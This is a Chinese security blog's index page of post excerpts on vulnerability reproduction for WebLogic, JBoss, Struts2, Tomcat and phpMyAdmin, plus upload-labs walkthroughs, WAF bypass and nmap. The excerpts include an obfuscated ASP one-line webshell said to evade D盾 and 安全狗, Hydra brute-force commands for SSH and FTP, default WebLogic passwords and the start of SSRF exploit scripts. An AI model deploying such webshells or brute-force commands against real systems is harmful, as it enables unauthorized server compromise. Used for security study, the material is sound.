WEB安全
tdcoming
这个作者很懒,什么都没留下…
展开
-
Structs
Struts2那些事S2-001漏洞描述Apache Struts2是Apache基金会发布的一款实现了MVC模式的中间件软件,广泛应用于Web开发和大型网站建设。WebWork 2.1+和Struts 2的altSyntax功能允许将OGNL表达式插入到文本字符串中并递归处理。 这允许恶意用户通常通过HTML文本字段提交一个字符串,其中包含一个OGNL表达式,如果表单验证失败,服务器将执行...原创 2019-11-10 12:52:04 · 2846 阅读 · 0 评论 -
[漏洞复现]Apache Solr Velocity模板远程代码执行
Apache Solr Velocity模板远程代码执行0X00 漏洞描述近日,国外安全研究员s00py公开了一个Apache Solr的Velocity模板注入的漏洞.该漏洞可以攻击最新版本的Solr.目前该漏洞利用详情已经广泛流传于Github以及各大安全群,且公开的EXP可以执行任意命令并自带回显.官方暂未发布补丁.0X01 漏洞CVE暂无0X02 影响范围包括但不限于8.2...原创 2019-10-31 17:30:43 · 890 阅读 · 0 评论 -
weblogic预警及历史漏洞
简介1、 Oracle WebLogic CVE-2019-2891 漏洞预警2、WebLogic历史漏洞回顾1.预警Oracle 官方发布了 2019 年 10 月的严重补丁更新 CPU(Critical Patch Update),其中修复了存在于 WebLogic 中的一个高危漏洞(CVE-2019-2891)。1.1预警描述此漏洞为远程代码执行漏洞,基于全球使用该产品用...原创 2019-10-17 21:21:13 · 1250 阅读 · 0 评论 -
Waf从入门到Bypass
Waf从入门到BypassWeb应用程序防火墙是位于Web应用程序与客户端端点之间的安全策略实施点。该功能可以用软件或硬件,在设备设备中运行或在运行通用操作系统的典型服务器中实现。它可以是独立设备,也可以集成到其他网络组件中。 对于WAF,你了解多少?需要这篇文章能对你有所帮助!原文链接:点我可以选择加入风起安全一起交流技术!0X00 介绍WAF如何工作:使用一组规则来区分正常...原创 2019-10-15 08:56:06 · 3362 阅读 · 0 评论 -
WebLogic任意文件上传漏洞(CVE-2018-2894)利用复现
环境搭建参照:https://blog.csdn.net/qq_29647709/article/details/84892582登录系统环境启动后,访问http://192.1658.1.15:7001/console,即可看到后台登录页面。登录后台页面,点击base_domain的配置,在“高级”中开启“启用 Web 服务测试页”选项:漏洞复现访问http://192.16...原创 2018-12-09 16:36:02 · 2520 阅读 · 0 评论 -
Weblogic漏洞之弱口令、任意文件读取、上传shell
弱口令环境启动后,访问http://192.168.1.15:7001/console/login/LoginForm.jsp,即为weblogic后台。本环境存在弱口令可以直接登录:weblogicOracle@123weblogic常用弱口令:1. Oracle - WebLogicMethod HTTPUser ID systemPassword password...原创 2018-12-09 19:36:12 · 6991 阅读 · 1 评论 -
weblogic SSRF漏洞(CVE-2014-4210)检测利用
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。SSRF漏洞检测利用脚本检测def run(self): headers = { "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) App...原创 2018-12-10 11:20:41 · 9545 阅读 · 0 评论 -
JBoss HttpAdaptor JMXInvokerServlet漏洞利用
项目地址https://github.com/joaomatosf/jexboss项目简介jexboss是一个使用Python编写的Jboss漏洞检测利用工具,通过它可以检测并利用web-console,jmx-console,JMXInvokerServlet这三个漏洞,并且可以获得一个shell。使用方法git clone https://github.com/joaomatos...原创 2018-11-22 14:35:16 · 3271 阅读 · 0 评论 -
Struts2 devMode远程代码执行漏洞检测利用
Apache Struts 2是世界上最流行的Java Web服务器框架之一,当Struts2开启devMode模式时,将导致严重远程代码执行漏洞。如果WebService 启动权限为最高权限时,可远程执行任意命令,包括关机、建立新用户、以及删除服务器上所有文件等等。检测poc:#!/usr/bin/env python#coding:utf-8 -*-import sysimpo...原创 2018-12-10 16:53:23 · 4591 阅读 · 0 评论 -
JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)
该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。环境JBoss 5.x/6.x 自行安装漏洞原理该漏洞出现在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反...原创 2018-12-16 20:27:22 · 1765 阅读 · 0 评论 -
JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)
Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。漏洞环境下载安装好测试目标下载我...原创 2018-12-16 20:50:30 · 2625 阅读 · 0 评论 -
Apache Tomcat CVE-2019-0232 远程代码执行漏洞
漏洞简介2019年4月10日,Apache Tomcat报告了一个漏洞,报告中称在windows上运行的Apache Tomcat存在远程代码执行漏洞,漏洞编号为CVE-2019-0232。在Windows平台,远程攻击者向CGI Servlet发送一个精心设计的请求,在具有Apache Tomcat权限的系统上注入和执行任意操作系统命令。漏洞成因是当将参数从JRE传递到Windows环境时,由...原创 2019-04-20 15:46:39 · 4949 阅读 · 0 评论 -
phpstudy后门文件检测及利用
2019.9.20得知非官网的一些下载站中的phpstudy版本存在后门文件,基于研究的目的,于是有了以下这文。复现使用5.4版本的,互联网随便下载了一个0X00检测脚本(来源ChaMd5安全团队)Linux#! /bin/bash# author: pcat@chamd5.org# http://pcat.cc# trojan featuretrojan=@evalf...原创 2019-09-23 23:37:03 · 5147 阅读 · 0 评论 -
phpMyAdmin跨站点请求伪造漏洞
CVE-2019-12922 phpMyAdmin 4.9.0.1-跨站请求伪造漏洞复现0X01 漏洞概述安全研究人员Manuel Garcia Cardenas近日公布了最常用的管理MySQL和MariaDB数据库的应用程序phpMyAdmin中的0 day漏洞细节和PoC。phpMyAdmin是一个用PHP编写的免费软件工具,也是用于处理MySQL或MariaDB数据库服务器的开源管理...原创 2019-10-06 23:10:52 · 588 阅读 · 0 评论 -
Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)检测与利用复现
Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。漏洞搭建可以参考:https://blog.csdn.net/qq_29647709/article/details/84892582漏洞检测检测工具下载https://pan.baidu....原创 2018-12-09 15:28:41 · 9752 阅读 · 1 评论 -
Nginx 解析漏洞复现
该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞。复现环境版本信息:Nginx 1.x 最新版PHP 7.x最新版解析漏洞访问http://192.168.1.15/uploadfiles/nginx.png发现一张正常图片http://http原创 2018-12-19 18:50:52 · 3274 阅读 · 0 评论 -
搜索引擎的故事
本篇要介绍的搜索引擎包括:Shodan,censys,钟馗之眼,Google,FoFa,Dnsdb等。介绍的内容主要是这几款搜索引擎的一些高级语法,掌握高级语法会让搜索结果更准确。Google搜索引擎这里之所以要介绍google搜索引擎,是因为它有别于百度、搜狗等内容搜索引擎,其在安全界有着非同一般的地位,甚至专门有一名词为google hacking用来形容google与安全非同寻常的关...原创 2018-12-04 16:19:57 · 2512 阅读 · 0 评论 -
思维导图问安全
#思维导图的强大<?phpecho(“开局一张图,过程全靠编!”)?>运维安全渗透的艺术情报收集企业安全防御XSSSSRFnmap密码找回逻辑漏洞浏览器安全 肯定还有很多故事,来一起编把!!!...原创 2018-03-12 20:01:48 · 603 阅读 · 0 评论 -
nmap为什么这么强大之主机发现
Nmap为什么这么强大?made by tdcoming!1.概述 大家都知道,使用我们的nmap真尼玛强大,从发现主机,到端口探测,到服务发现,漏洞利用等等,无所不能。在信息收集方面可谓是不可缺少的神器。那么我们namp为什么这么强大,今天我们就来一起探究下。2.nmap主机发现首先介绍nmap的主机发现nmap --help #查看nmap的一些使用参数,...原创 2018-03-14 20:26:24 · 10220 阅读 · 1 评论 -
Upload-labs文件上传(6-10)
第六关(禁止上传很多中后缀,识别大小写)我们查看第五关代码: $file_name = deldot($file_name);//删除文件名末尾的点 $file_ext = strrchr($file_name, '.'); $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串...原创 2018-07-29 10:54:20 · 2026 阅读 · 0 评论 -
Upload-labs文件上传(11-19)
十一关(00截断)首先查看一下源代码: $ext_arr = array('jpg','png','gif'); $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],&amp;quot;.&amp;quot;)+1); if(in_array($file_ext,$ext_arr...原创 2018-07-29 15:32:29 · 4575 阅读 · 1 评论 -
Upload-labs文件上传漏洞练习(1-5)
文件上传漏洞练习Upload-labs是一个帮你总结所有类型的上传漏洞的靶场,包括常见的文件上传漏洞: 项目地址:https://github.com/c0ny1/upload-labs 第一关 直接上传php木马,发现前端报错: 使用传统的抓包,修改后缀名。是可以上传成功的,但是不是这一关的目的,我们看看源代码分析一波。function checkFile() { ...原创 2018-07-28 14:51:58 · 7196 阅读 · 1 评论 -
Web 中间件漏洞
1. Tomcat Tomcat是Apache Jakarta软件组织的一个子项目,Tomcat是一个JSP/Servlet容器,它是在SUN公司的JSWDK(Java Server Web Development Kit)基础上发展起来的一个JSP和Servlet规范的标准实现,使用Tomcat可以体验JSP和Servlet的最新规范。端口号:8080攻击方法: 默认口令...原创 2018-08-22 16:48:31 · 2318 阅读 · 0 评论 -
常见数据库漏洞
MySQL数据库默认端口:3306攻击方法: 爆破:弱口令 身份认证漏洞:CVE-2012-2122 拒绝服务攻击 Phpmyadmin万能密码绕过:用户名:‘localhost’@’@” 密码任意 提权参考: https://www.seebug.org/appdir/MySQL http://www.waitalone.cn/my...原创 2018-08-22 16:56:15 · 8984 阅读 · 1 评论 -
常见服务/协议漏洞
FTP 服务FTP服务:ftp服务我分为两种情况,第一种是使用系统软件来配置,比如IIS中的FTP文件共享或Linux中的默认服务软件;第二种是通过第三方软件来配置,比如Serv-U还有一些网上写的简易ftp服务器等; 默认端口:20(数据端口);21(控制端口);69(tftp小型文件传输协议)攻击方式:爆破:ftp的爆破工具有很多,这里我推荐owasp的Bruter 以及msf中f...原创 2018-08-22 17:23:04 · 5886 阅读 · 0 评论 -
Hydra常见服务爆破
SSH服务hydra -l 用户名 -P 字典 -t 线程 -vV -e ns ip sshFTP服务 (1)破解指定用户hydra ip ftp -l 用户名 -P 字典 -t(线程默认16) -vvhydra ip ftp -l 用户名 -P 字典 -e ns(n表示空密码,s表示制定用户和密码试探-vv(2)批量破解hydra ip ftp -...原创 2018-08-23 15:26:38 · 4190 阅读 · 0 评论 -
linux上安装NC
0X00 下载适合的版本 wget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1-1.i386.rpm0X01安装依赖环境 yum list glibc*rpm -ivh netcat-0.7.1-1.i386.rpm0X02安装nc rpm -ivh netcat-...原创 2018-08-28 17:16:24 · 6537 阅读 · 0 评论 -
asp版过最新版本D盾安全狗一句话
<%<!--"-->eXecUTe(fun("%167%184%163%174%98%180%167%179%183%167%181%182%106%100%142%163%176%166%137%180%167%187%100%107"))Function fun(Str): Str = Split(Str,"%") For x=1 To Ubound(S...原创 2018-09-02 13:25:55 · 3756 阅读 · 0 评论 -
关于征集大家学习博客的通知
今天整理了些爬取博客网站文章的爬虫,自己觉得不错的文章保留了下来,如果你们有不错博客可以推荐,不限制国内国外。在此向您请教!虚心学习。未来之路希望您推荐不错的博客网站给我(不限制国内国外)完成您推荐的博客文章爬取,如果您有需求向您推荐最新或者比较好的文章有小伙伴需要哪方面文章可以马上帮您推荐相关文章!现在进行 已经完成一些小伙伴的推荐的网站文章爬取,并分享文章如...原创 2018-09-12 16:31:07 · 446 阅读 · 0 评论 -
burpsuite扩展集成sqlmap插件
通常我们在使用sqlmap测试SQL注入问题的时候会先使用burpsuite来抓包,然后交给sqlmap进行扫描,此操作略显繁琐。为了避免这种繁琐的重复操作可以将sqlmap以插件的方式集成到burpsuite里面,实现request右击send to Sqlmap了。1. 环境准备》 python2.7》 burpsuite》 sqlmap》 sqlmap.jar包2. pyth...转载 2018-11-13 16:28:20 · 1393 阅读 · 1 评论 -
Google浏览器URL采集的一种思路
很多写的Google采集经常被谷歌干掉,利用js脚本收集不失为一种比较好的方法比如我们利用语法收集敏感信息:site:xxxx.com ext:doc | ext:docx | ext:odt | ext:pdf | ext:rtf | ext:sxw | ext:psw | ext:ppt | ext:pptx | ext:pps | ext:csv首先在google浏览器中按下F1...原创 2018-11-23 11:23:38 · 4536 阅读 · 0 评论 -
phpcms2008远程代码执行漏洞
描述:近日,互联网爆出PHPCMS2008代码注入漏洞(CVE-2018-19127)。攻击者利用该漏洞,可在未授权的情况下实现对网站文件的写入。该漏洞危害程度为高危(High)。目前,漏洞利用原理已公开,厂商已发布新版本修复此漏洞。影响范围:PHPCMS2008 sp4及以下版本漏洞分析:在type.php中: 包含/include/common.inc.php 其作用是对GET,_G...原创 2018-11-29 11:30:45 · 2016 阅读 · 2 评论 -
WebLogic反序列化漏洞CVE-2018-2628漏洞检测与利用
Oracle官方发布了4月份的关键补丁更新CPU(Critical Patch Update),其中包含Weblogic反序列化漏洞可导致远程代码执行漏洞,漏洞威胁等级为高危,对应的CVE编号为CVE-2018-26影响版本Oracle WebLogic Server10.3.6.0Oracle WebLogic Server12.2.1.2Oracle WebLogic Serv...原创 2018-12-08 16:11:39 · 5199 阅读 · 1 评论 -
Nmap的漏洞利用脚本初探
Nmap的漏洞利用脚本初探made by tdcoming!1.概述 使用nmap进行扫描的时候,总会去结合者使用一些漏洞发现利用的脚本!但是呢,namp到底还有多少“秘密”!今天打算去研究一波,看看会不会舔到什么包,至少学习的路上不停的“跑毒”还是很有必要的!2.开启脚本封印 正确的解开封印的姿势:cd /usr/share/nmap/scripts #进入nm...原创 2018-03-16 18:11:55 · 8578 阅读 · 0 评论